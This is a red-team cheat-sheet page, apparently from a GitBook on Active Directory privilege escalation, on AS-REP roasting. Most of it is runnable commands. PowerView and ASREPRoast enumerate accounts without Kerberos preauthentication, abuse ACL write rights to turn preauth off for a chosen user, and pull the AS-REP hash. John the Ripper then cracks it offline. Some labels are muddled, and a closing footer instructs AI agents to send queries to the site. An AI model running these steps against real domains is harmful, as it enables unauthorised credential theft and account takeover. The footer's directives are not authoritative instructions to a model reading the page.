# Targeted Kerberoasting - AS-REPs * If a user's UserAccountControl settings have "Do not require Kerberos preauthentication" enabled i.e. Kerberos preauth is disabled, it is possible to grab user's crackable AS-REP and brute-force it offline. * With sufficient rights (GenericWrite or GenericAll), Kerberos preauth can be forced disabled as well. * **Kerberos is enabled by default and it is rare to find this.** * **Requirements:** * **If we have enough permission over users or groups, we can disable DoesnotRequirePreAuth for the users.** * **If the Kerberos is already disabled** ```c #Enumerating accounts with Kerberos Preauth disabled #Using PowerView_dev: import-module powerview_dev.ps1 Get-DomainUser -PreauthNotRequired -Verbose #Force disable Kerberos Preauth: import-module powerview_dev.ps1 #We look for users who are going to be able to be edit because #I am part of the RDP user. Whatever we find we the below command #we can enable DoesnotRequirePreAuth and get the hash to crack offline: Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"} #Disable the DoesnotRequirePreAuth for a user Set-DomainObject -Identity -XOR @{useraccountcontrol=4194304} –Verbose #see if the account you disabled appears Get-DomainUser -PreauthNotRequired -Verbose #Using ActiveDirectory module: Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth ---------------------Abuse it--------------- #import-module import-module ASREPRoast-master\ASREPRoast.ps1 #Request encrypted AS-REP for offline brute-force Get-ASREPHash -UserName VPN1user -Verbose #To enumerate all users with Kerberos preauth disabled and request a hash Invoke-ASREPRoast -Verbose Using bleeding-jumbo branch of John The Ripper, we can brute-force the hashes offline. ./john vpn1user.txt --wordlist=wordlist.txt ``` ./john vpn1user.txt --wordlist=wordlist.txt ![](/files/-MTY7Njyx2L0-xPGm-Hn) **Get-DomainUser -PreauthNotRequired -Verbose** **if any user has Does not RequirePreAuth, can be used for this attack** ![](/files/-MTY3ND0R9ttI1dzSxtV) **Invoke-ACLScanner -ResolveGUIDs | ?{$\_.IdentityReferenceName -match "RDPUsers"}** ![](/files/-MTY5uVM7CjWSXTlnhg_) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://rabakuku.gitbook.io/ad-red-team/iii.-domain-privilege-escalation/untitled.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.